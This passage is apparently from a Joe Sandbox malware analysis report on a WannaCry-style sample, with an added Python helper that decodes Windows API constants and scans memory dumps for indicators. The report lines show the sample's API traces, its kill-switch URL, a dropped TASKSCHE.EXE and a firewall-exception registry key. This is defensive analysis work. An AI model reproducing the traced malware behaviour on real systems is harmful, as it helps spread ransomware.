                                                                                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$AttributesCreate$MappingView
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1961427682-0
                                                                                                                                                • Opcode ID: a597af1445ea8736db27a55b35799f807b5cdfd84ba473e7882835a9cfdd7254
                                                                                                                                                • Instruction ID: 5241e261c6a8b1a9cf08daa61a461fa69fc83fe37cd40be9c894cf7c8eac2c63
                                                                                                                                                • Opcode Fuzzy Hash: a597af1445ea8736db27a55b35799f807b5cdfd84ba473e7882835a9cfdd7254
                                                                                                                                                • Instruction Fuzzy Hash: E62112B0205309BFEF219E658D45BFA366DAF01619F500229E91A9E0A4D7F5AF058728
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%
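The two functions above are easier to read once the raw argument constants in the API trace are named (0x84000000 in InternetOpenUrlA, C0000000 / 00000003 in CreateFileA, 000F001F in MapViewOfFile) and once the string indicators the report extracted (the sinkholed WannaCry kill-switch URL, TASKSCHE.EXE, the firewall AuthorizedApplications key) can be searched for in one's own memory dumps. The following Python helper is an added example, not code from the Joe Sandbox report or from the sample: it parses API lines in the report's own format, decodes the constants with values from the Windows SDK headers, and scans a constructed dump buffer (SAMPLE_DUMP, made up for the demonstration) for the indicators in ASCII and UTF-16LE. The SAMPLE_TRACE lines are shortened copies of the report's API lines.

```python
"""Triage helpers for a Joe Sandbox API trace: name the raw constants in the
report's API lines and scan a memory dump for the string indicators it lists.
Added example, not code from the report or from the analysed sample."""
import re

# Constant tables; values as defined in the Windows SDK headers.
WININET_OPEN_URL_FLAGS = {
    0x80000000: "INTERNET_FLAG_RELOAD",          # bypass the cache, always fetch
    0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",  # do not store the response
    0x00800000: "INTERNET_FLAG_SECURE",
    0x00400000: "INTERNET_FLAG_KEEP_CONNECTION",
    0x00200000: "INTERNET_FLAG_NO_AUTO_REDIRECT",
    0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE",
}
INTERNET_OPEN_TYPE = {0: "INTERNET_OPEN_TYPE_PRECONFIG", 1: "INTERNET_OPEN_TYPE_DIRECT",
                      3: "INTERNET_OPEN_TYPE_PROXY"}
GENERIC_ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
                  0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
FILE_SHARE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
CREATE_DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
                      4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x40: "PAGE_EXECUTE_READWRITE"}
FILE_MAP_ACCESS = {0xF001F: "FILE_MAP_ALL_ACCESS", 0x20: "FILE_MAP_EXECUTE",
                   0x4: "FILE_MAP_READ", 0x2: "FILE_MAP_WRITE"}


def decode_flags(value, table):
    """Split a bitmask into named flags. Multi-bit masks (FILE_MAP_ALL_ACCESS)
    are tried before single bits so they are not reported as their parts;
    bits the table does not know are appended as hex."""
    names, left = [], value
    for mask, name in sorted(table.items(),
                             key=lambda kv: (bin(kv[0]).count("1"), kv[0]), reverse=True):
        if mask and left & mask == mask:
            names.append(name)
            left &= ~mask
    if left:
        names.append(hex(left))
    return names


TRACE_RE = re.compile(r"(\w+)\.(\w+)\((.*)\), ref: ([0-9A-Fa-f]+)")


def parse_trace_line(line):
    """'CreateFileA.KERNELBASE(?,C0000000,...), ref: 7FEA44ED' ->
    ('CreateFileA', 'KERNELBASE', [None, 0xC0000000, ...], 0x7FEA44ED).
    '?' is an argument the sandbox could not recover; 8-hex-digit tokens are
    integers; anything else (a DLL name, a path) is kept as a string."""
    m = TRACE_RE.search(line)
    if not m:
        raise ValueError("not an API trace line: %r" % line)
    args = []
    for tok in m.group(3).split(","):
        tok = tok.strip()
        if tok == "?":
            args.append(None)
        elif re.fullmatch(r"-?[0-9A-Fa-f]{8}", tok):
            args.append(int(tok, 16))
        else:
            args.append(tok)
    return m.group(1), m.group(2), args, int(m.group(4), 16)


def decode_call(api, args):
    """Name the constants in the calls this report shows; other APIs give {}."""
    if api == "InternetOpenA":
        return {"access_type": INTERNET_OPEN_TYPE.get(args[1], hex(args[1]))}
    if api == "InternetOpenUrlA":
        return {"flags": decode_flags(args[4], WININET_OPEN_URL_FLAGS)}
    if api == "CreateFileA":
        return {"access": decode_flags(args[1], GENERIC_ACCESS),
                "share": decode_flags(args[2], FILE_SHARE),
                "disposition": CREATE_DISPOSITION.get(args[4], hex(args[4]))}
    if api == "CreateFileMappingA":
        return {"protect": PAGE_PROTECT.get(args[2], hex(args[2]))}
    if api == "MapViewOfFile":
        return {"access": decode_flags(args[1], FILE_MAP_ACCESS)}
    return {}


def decode_trace(lines):
    """(api, ref address, decoded arguments) for each trace line."""
    out = []
    for line in lines:
        api, _module, args, ref = parse_trace_line(line)
        out.append((api, ref, decode_call(api, args)))
    return out


# Shortened copies of the report's own API lines.
SAMPLE_TRACE = [
    "• InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040817B",
    "• InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,84000000,00000000), ref: 00408194",
    "• CreateFileA.KERNELBASE(?,C0000000,00000001,00000000,00000003,00000000,00000000,?,65676E61), ref: 7FEA44ED",
    "• CreateFileMappingA.KERNEL32(?,00000000,00000004,00000000,00000000,00000000,?,C0000000), ref: 7FEA4565",
    "• MapViewOfFile.KERNELBASE(00000000,000F001F,00000000,00000000,00000000), ref: 7FEA459A",
]

# String indicators listed in the report (kill-switch URL, dropped binary, firewall key).
IOCS = [
    "http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com",
    "C:\\WINDOWS\\TASKSCHE.EXE",
    "SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy"
    "\\StandardProfile\\AuthorizedApplications\\List",
]


def find_iocs(blob, iocs=IOCS):
    """(offset, encoding, indicator) for every case-insensitive ASCII or
    UTF-16LE occurrence of an indicator in a dump buffer, sorted by offset."""
    hits = []
    for ioc in iocs:
        for enc in ("ascii", "utf-16-le"):
            pat = re.compile(re.escape(ioc.encode(enc)), re.IGNORECASE)
            hits.extend((m.start(), enc, ioc) for m in pat.finditer(blob))
    return sorted(hits)


# Constructed dump fragment: the kill-switch URL in ASCII, the dropper path in UTF-16LE.
SAMPLE_DUMP = (b"\x00" * 16
               + b"http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com\x00"
               + b"\x90" * 8
               + "C:\\WINDOWS\\tasksche.exe".encode("utf-16-le") + b"\x00\x00junk")

if __name__ == "__main__":
    for api, ref, decoded in decode_trace(SAMPLE_TRACE):
        print("%-20s @ %08X  %s" % (api, ref, decoded))
    for off, enc, ioc in find_iocs(SAMPLE_DUMP):
        print("IOC at 0x%x (%s): %s" % (off, enc, ioc))
```

Run against the report's lines, the decoder shows the kill-switch probe is opened with INTERNET_FLAG_RELOAD | INTERNET_FLAG_NO_CACHE_WRITE (so a sandbox or sinkhole answering for that domain is what the sample actually sees, never a cached response), and that the file routine opens its target with GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ, OPEN_EXISTING and maps it FILE_MAP_ALL_ACCESS, i.e. an existing file mapped writable in place. The scanner is meant for your own process or memory dumps; the UTF-16LE pass matters because paths and registry keys are often held as wide strings even when the sample imports the A variants of the APIs.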

Control-flow Graph (rendered image not reproduced; the executed / not-executed colouring is lost). Three basic blocks, ac05ba-ac05c9: block ac05bf calls Sleep and loops back to ac05ba (a delay loop), with the exit at ac05c9.
                                                                                                                                                APIs
                                                                                                                                                • Sleep.KERNELBASE(0000000A,00AC085C,?,00000000,00000000,-00003C38,00000002,00000000,?,00000000), ref: 00AC05C1
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.502417271.0000000000AC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_ac0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Sleep
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3472027048-0
                                                                                                                                                • Opcode ID: 3c1f989dfd13240381299ec7adf5382b251643946d8aa86ca05208ab7bb78418
                                                                                                                                                • Instruction ID: 9cc8f0a8d01680993bf63e34577e8a49fd1a228169588fba9a0571ccc177712d
                                                                                                                                                • Opcode Fuzzy Hash: 3c1f989dfd13240381299ec7adf5382b251643946d8aa86ca05208ab7bb78418
                                                                                                                                                • Instruction Fuzzy Hash: DDB0127C240308D7DA140A10440DF041A347F00B11FE2405DE2074C0C007E407001C09
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetWindowsDirectoryA.KERNEL32(C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe,00000104), ref: 7FEA3CA1
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000002), ref: 7FEA3CD4
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,7FEA3D41), ref: 7FEA3D4C
                                                                                                                                                • LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 7FEA3D5F
                                                                                                                                                • GetTickCount.KERNEL32 ref: 7FEA3D93
                                                                                                                                                • GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,7FEA6EF6,00000000,00000000,00000000,00000000), ref: 7FEA3E65
                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe,000000C8), ref: 7FEA3EE2
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.505701930.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProc$CountDirectoryFileInformationLibraryLoadModuleNameTickVolumeWindows
                                                                                                                                                • String ID: ADVAPI32.DLL$C:,$C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$\DEVICE\AFD\ENDPOINT
                                                                                                                                                • API String ID: 1749273276-2923680188
                                                                                                                                                • Opcode ID: f516923bb6111dac5ea2ce27cbf4c730b644d8035d3db586d383e9b78a19a3eb
                                                                                                                                                • Instruction ID: 6856dd48e4ced1a9f2286be03aa6e2628cc93b41bccce76cbf3563a38adebb89
                                                                                                                                                • Opcode Fuzzy Hash: f516923bb6111dac5ea2ce27cbf4c730b644d8035d3db586d383e9b78a19a3eb
                                                                                                                                                • Instruction Fuzzy Hash: 10020571419348BFEB229F748C4ABEA7BACEF41304F004559EC4A9E081D7F66F4597A2
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetWindowsDirectoryA.KERNEL32(C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe,00000104), ref: 00AC3CA1
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000002), ref: 00AC3CD4
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00AC3D41), ref: 00AC3D4C
                                                                                                                                                • LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00AC3D5F
                                                                                                                                                • GetTickCount.KERNEL32 ref: 00AC3D93
                                                                                                                                                • GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00AC6EF6,00000000,00000000,00000000,00000000), ref: 00AC3E65
                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe,000000C8), ref: 00AC3EE2
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.502417271.0000000000AC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_ac0000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProc$CountDirectoryFileInformationLibraryLoadModuleNameTickVolumeWindows
                                                                                                                                                • String ID: ADVAPI32.DLL$C:,$C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe$C:\WINDOWS\TASKSCHE.EXE$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
                                                                                                                                                • API String ID: 1749273276-3999816838
                                                                                                                                                • Opcode ID: f516923bb6111dac5ea2ce27cbf4c730b644d8035d3db586d383e9b78a19a3eb
                                                                                                                                                • Instruction ID: 80a98cb13cd68459e7336115a6dac1895a87c0bb6ad42bab614eefef71ff2ff4
                                                                                                                                                • Opcode Fuzzy Hash: f516923bb6111dac5ea2ce27cbf4c730b644d8035d3db586d383e9b78a19a3eb
                                                                                                                                                • Instruction Fuzzy Hash: 8D02E172408258BFEF21AF248C5AFEA7BACEF41310F06451DE8499E082D7F45F4587A6
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetModuleHandleA.KERNEL32(7FEA3CBA), ref: 7FEA3CC2
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000002), ref: 7FEA3CD4
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,7FEA3D41), ref: 7FEA3D4C
                                                                                                                                                • LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 7FEA3D5F
                                                                                                                                                • GetTickCount.KERNEL32 ref: 7FEA3D93
Strings
Memory Dump Source
• Source File: 00000004.00000002.505701930.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
Yara matches
Similarity
• API ID: AddressProc$CountHandleLibraryLoadModuleTick
• String ID: ADVAPI32.DLL$C:,$C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$\DEVICE\AFD\ENDPOINT
• API String ID: 2837544101-2923680188
• Opcode ID: 5b48797bfded511fe3541d43c5fd4cc9561b065424dfc698fabc9acd851576a7
• Instruction ID: b4b3212d39e947ac5d9392814a2c7224f35c85923ea667b823aff5088932c5b3
• Opcode Fuzzy Hash: 5b48797bfded511fe3541d43c5fd4cc9561b065424dfc698fabc9acd851576a7
• Instruction Fuzzy Hash: 45E11371519348BFEB229F708C4ABFA7BACEF41304F004559EC4A9E081D6F66F059762
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(00AC3CBA), ref: 00AC3CC2
• GetProcAddress.KERNEL32(00000000,00000002), ref: 00AC3CD4
• GetProcAddress.KERNEL32(00000000,00AC3D41), ref: 00AC3D4C
• LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00AC3D5F
• GetTickCount.KERNEL32 ref: 00AC3D93
Strings
Memory Dump Source
• Source File: 00000004.00000002.502417271.0000000000AC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_ac0000_mssecsvc.jbxd
Yara matches
Similarity
• API ID: AddressProc$CountHandleLibraryLoadModuleTick
• String ID: ADVAPI32.DLL$C:,$C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe$C:\WINDOWS\TASKSCHE.EXE$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
• API String ID: 2837544101-3999816838
• Opcode ID: 5b48797bfded511fe3541d43c5fd4cc9561b065424dfc698fabc9acd851576a7
• Instruction ID: 4b9440342b2253e287d26fee50ab9d9f9a533643b4c8261a8e69d5845adde2d2
• Opcode Fuzzy Hash: 5b48797bfded511fe3541d43c5fd4cc9561b065424dfc698fabc9acd851576a7
• Instruction Fuzzy Hash: EBE10172508258BFEF25AF248C5AFEA7BACEF41300F06451DEC499E082D6F45F4587A6
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(7FEA3CE5), ref: 7FEA3CF0
• GetSystemDirectoryA.KERNEL32(C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe,00000104), ref: 7FEA3D07
  • Part of subcall function 7FEA3D1F: lstrcat.KERNEL32(C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe,7FEA3D12), ref: 7FEA3D20
  • Part of subcall function 7FEA3D1F: GetProcAddress.KERNEL32(00000000,7FEA3D41), ref: 7FEA3D4C
  • Part of subcall function 7FEA3D1F: LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 7FEA3D5F
  • Part of subcall function 7FEA3D1F: GetTickCount.KERNEL32 ref: 7FEA3D93
  • Part of subcall function 7FEA3D1F: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,7FEA6EF6,00000000,00000000,00000000,00000000), ref: 7FEA3E65
Strings
Memory Dump Source
• Source File: 00000004.00000002.505701930.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
Yara matches
Similarity
• API ID: AddressCountDirectoryHandleInformationLibraryLoadModuleProcSystemTickVolumelstrcat
• String ID: ADVAPI32.DLL$C:,$C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$\DEVICE\AFD\ENDPOINT
• API String ID: 215653160-2923680188
• Opcode ID: 260c0d83971146764b612a54da98fff840ddc31a6bb3a69eed28180f54add843
• Instruction ID: 7541589ca8aef85322091197c42534de99d7bca435932005a89768fd23254656
• Opcode Fuzzy Hash: 260c0d83971146764b612a54da98fff840ddc31a6bb3a69eed28180f54add843
• Instruction Fuzzy Hash: 4CE1F171409348BFEB229F708C4ABFA7BACEF42304F004559EC4A9E091D6F66F0597A1
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(00AC3CE5), ref: 00AC3CF0
• GetSystemDirectoryA.KERNEL32(C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe,00000104), ref: 00AC3D07
  • Part of subcall function 00AC3D1F: lstrcat.KERNEL32(C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe,00AC3D12), ref: 00AC3D20
  • Part of subcall function 00AC3D1F: GetProcAddress.KERNEL32(00000000,00AC3D41), ref: 00AC3D4C
  • Part of subcall function 00AC3D1F: LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00AC3D5F
  • Part of subcall function 00AC3D1F: GetTickCount.KERNEL32 ref: 00AC3D93
  • Part of subcall function 00AC3D1F: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00AC6EF6,00000000,00000000,00000000,00000000), ref: 00AC3E65
Strings
Memory Dump Source
• Source File: 00000004.00000002.502417271.0000000000AC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_ac0000_mssecsvc.jbxd
Yara matches
Similarity
• API ID: AddressCountDirectoryHandleInformationLibraryLoadModuleProcSystemTickVolumelstrcat
• String ID: ADVAPI32.DLL$C:,$C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe$C:\WINDOWS\TASKSCHE.EXE$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
• API String ID: 215653160-3999816838
• Opcode ID: 260c0d83971146764b612a54da98fff840ddc31a6bb3a69eed28180f54add843
• Instruction ID: 300dc2e70911624c4798ccc50677d5959064c040c3365b7c78012bb061d11580
• Opcode Fuzzy Hash: 260c0d83971146764b612a54da98fff840ddc31a6bb3a69eed28180f54add843
• Instruction Fuzzy Hash: F5E10172408248BFEF259F248C5AFEA7BACEF41300F06455DEC4A9E082D6F45F4587A5
Uniqueness
Uniqueness Score: -1.00%

APIs
• lstrcat.KERNEL32(C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe,7FEA3D12), ref: 7FEA3D20
  • Part of subcall function 7FEA3D36: LoadLibraryA.KERNEL32(7FEA3D2B), ref: 7FEA3D36
  • Part of subcall function 7FEA3D36: GetProcAddress.KERNEL32(00000000,7FEA3D41), ref: 7FEA3D4C
  • Part of subcall function 7FEA3D36: LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 7FEA3D5F
  • Part of subcall function 7FEA3D36: GetTickCount.KERNEL32 ref: 7FEA3D93
  • Part of subcall function 7FEA3D36: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,7FEA6EF6,00000000,00000000,00000000,00000000), ref: 7FEA3E65
Strings
Memory Dump Source
• Source File: 00000004.00000002.505701930.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
Yara matches
Similarity
• API ID: LibraryLoad$AddressCountInformationProcTickVolumelstrcat
• String ID: ADVAPI32.DLL$C:,$C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$\DEVICE\AFD\ENDPOINT
• API String ID: 2038497427-2923680188
• Opcode ID: 9a3d42354aede4d92b231a7e1a08d8f1ff67a071c39a48690dfdf21ca6a4930c
• Instruction ID: aa1c8551e8f76fbb525208f0bea2f920101e632125f5267fb1ed65396364aa08
• Opcode Fuzzy Hash: 9a3d42354aede4d92b231a7e1a08d8f1ff67a071c39a48690dfdf21ca6a4930c
• Instruction Fuzzy Hash: A2E1F071419348BFEB229F748C4ABFA7BACEF42304F004559E84A9E081DAF66F059765
Uniqueness
Uniqueness Score: -1.00%

APIs
• lstrcat.KERNEL32(C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe,00AC3D12), ref: 00AC3D20
  • Part of subcall function 00AC3D36: LoadLibraryA.KERNEL32(00AC3D2B), ref: 00AC3D36
  • Part of subcall function 00AC3D36: GetProcAddress.KERNEL32(00000000,00AC3D41), ref: 00AC3D4C
  • Part of subcall function 00AC3D36: LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00AC3D5F
  • Part of subcall function 00AC3D36: GetTickCount.KERNEL32 ref: 00AC3D93
  • Part of subcall function 00AC3D36: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00AC6EF6,00000000,00000000,00000000,00000000), ref: 00AC3E65
Strings
Memory Dump Source
• Source File: 00000004.00000002.502417271.0000000000AC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_ac0000_mssecsvc.jbxd
Yara matches
Similarity
• API ID: LibraryLoad$AddressCountInformationProcTickVolumelstrcat
• String ID: ADVAPI32.DLL$C:,$C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe$C:\WINDOWS\TASKSCHE.EXE$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
• API String ID: 2038497427-3999816838
• Opcode ID: 9a3d42354aede4d92b231a7e1a08d8f1ff67a071c39a48690dfdf21ca6a4930c
• Instruction ID: 4ade996946205155614f7ba88722abb3cb745b155a53f503ee0e4ca1bdc71565
• Opcode Fuzzy Hash: 9a3d42354aede4d92b231a7e1a08d8f1ff67a071c39a48690dfdf21ca6a4930c
• Instruction Fuzzy Hash: 02E1FF72508248BFEF25AF248C5AFEA7BACEF41300F06455DEC4A9E082D6F45F4587A5
Uniqueness
Uniqueness Score: -1.00%

APIs
• LoadLibraryA.KERNEL32(7FEA3D2B), ref: 7FEA3D36
  • Part of subcall function 7FEA3D4B: GetProcAddress.KERNEL32(00000000,7FEA3D41), ref: 7FEA3D4C
  • Part of subcall function 7FEA3D4B: LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 7FEA3D5F
  • Part of subcall function 7FEA3D4B: GetTickCount.KERNEL32 ref: 7FEA3D93
  • Part of subcall function 7FEA3D4B: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,7FEA6EF6,00000000,00000000,00000000,00000000), ref: 7FEA3E65
Strings
Memory Dump Source
• Source File: 00000004.00000002.505701930.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
Yara matches
Similarity
• API ID: LibraryLoad$AddressCountInformationProcTickVolume
• String ID: ADVAPI32.DLL$C:,$C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$\DEVICE\AFD\ENDPOINT
• API String ID: 3734769084-2923680188
• Opcode ID: fe378de023044d5e93c1fdb9f401057012e9a432939cf19daad1b95bd79d3ac1
• Instruction ID: 04a7c8116a9fb35f71bbffa2808c6274a5c5ffd0f068440cbef2dd7623ef1827
• Opcode Fuzzy Hash: fe378de023044d5e93c1fdb9f401057012e9a432939cf19daad1b95bd79d3ac1
• Instruction Fuzzy Hash: 9DD10071419348BFEB229F748C4ABFA7BACEF41304F004519E84A9E091DBF66F059765
Uniqueness
Uniqueness Score: -1.00%

APIs
• LoadLibraryA.KERNEL32(00AC3D2B), ref: 00AC3D36
  • Part of subcall function 00AC3D4B: GetProcAddress.KERNEL32(00000000,00AC3D41), ref: 00AC3D4C
  • Part of subcall function 00AC3D4B: LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00AC3D5F
  • Part of subcall function 00AC3D4B: GetTickCount.KERNEL32 ref: 00AC3D93
  • Part of subcall function 00AC3D4B: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00AC6EF6,00000000,00000000,00000000,00000000), ref: 00AC3E65
Strings
Memory Dump Source
• Source File: 00000004.00000002.502417271.0000000000AC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_ac0000_mssecsvc.jbxd
Yara matches
Similarity
• API ID: LibraryLoad$AddressCountInformationProcTickVolume
• String ID: ADVAPI32.DLL$C:,$C:\Program Files (x86)\QxmjpcazkXhrxEMyZMHZXXEYGdZKTLIuGGuluQecNfOrZXEwSk\mcelwciKpeNAdrHBUbBbQgwqJRdg.exe$C:\WINDOWS\TASKSCHE.EXE$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
